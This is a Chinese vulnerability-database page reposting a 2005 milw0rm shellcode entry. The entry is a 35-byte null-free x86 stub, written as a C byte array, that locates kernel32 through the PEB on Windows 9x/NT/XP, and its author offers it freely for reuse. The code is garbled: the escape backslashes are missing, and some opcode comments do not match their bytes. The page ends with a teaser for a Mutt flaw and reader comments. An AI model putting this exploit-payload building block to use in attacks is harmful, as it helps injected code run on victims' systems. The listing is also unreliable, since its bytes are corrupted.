Windows (9x/NT/2000/XP) – PEB Method Shellcode (35 bytes)
漏洞ID | 1054856 | 漏洞类型 | |
发布时间 | 2005-01-09 | 更新时间 | 2005-01-09 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*This is a 35 byte C implementation of the use of the PEB method to get
*the kernel32 base address on Windows. This is generic code designed to
*run on both Windows 9x and NT based systems. The code has been optimized
*to not have any 00h bytes so that you wont have to use an XOR routine to
*encode the shellcode. I used relative jumps and xor tricks to avoid the
*00h bytes and make the code as small as I could get it. Feel free to use
*this source in anything that you want.
*/
/* 35 byte PEB method for Windows 9x/NT/2k/XP
* 0x00 byte optimized, no XOR routine required.
*
* www.4x10m.com
* oc.192
* irc.4x10m.net #4x10m
*/
unsigned char shellcode[] =
/* 35 byte PEB - 00h removal and size optimized */
/* 22 - 24 total clock cycles on a x486 */
"x31xC0" /* xor eax, eax */
"x31xD2" /* xor edx, edx */
"xB2x30" /* mov dl, 30h */
"x64x8Bx02" /* mov eax, [fs:edx] */ /* PEB base address */
"x85xC0" /* test eax, eax */
"x78xC0" /* js 0Ch */
"x8Bx40x0C" /* mov eax, [eax+0Ch] */ /* NT kernel32 routine */
"x8Bx70x1C" /* mov esi, [eax+1Ch] */
"xAD" /* lodsd */
"x8Bx40x08" /* mov eax, [eax+08h] */
"xEBx07" /* jmp short 09h */
"x8Bx40x34" /* mov eax, [eax+34h] */ /* 9x kernel32 routine */
"x8Dx40x7C" /* lea eax, [eax+7Ch] */
"x8Dx40x3C" /* mov eax, [eax+3Ch] */
;
int main(int argc, char *argv[]) {
//void (*sc)() = (void *)shellcode;
printf("len:%dn", sizeof(shellcode));
//sc();
return 0;
}
// milw0rm.com [2005-01-09]
Mutt邮件客户端命令执行漏洞 漏洞ID 1207317 漏洞类型 未知 发布时间 1998-07-28 更新时间 1998-07-28 CVE编号 CVE-1999-0941 CNNVD-ID CNNVD-199807-027 漏洞平台 N/A CVSS评分…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666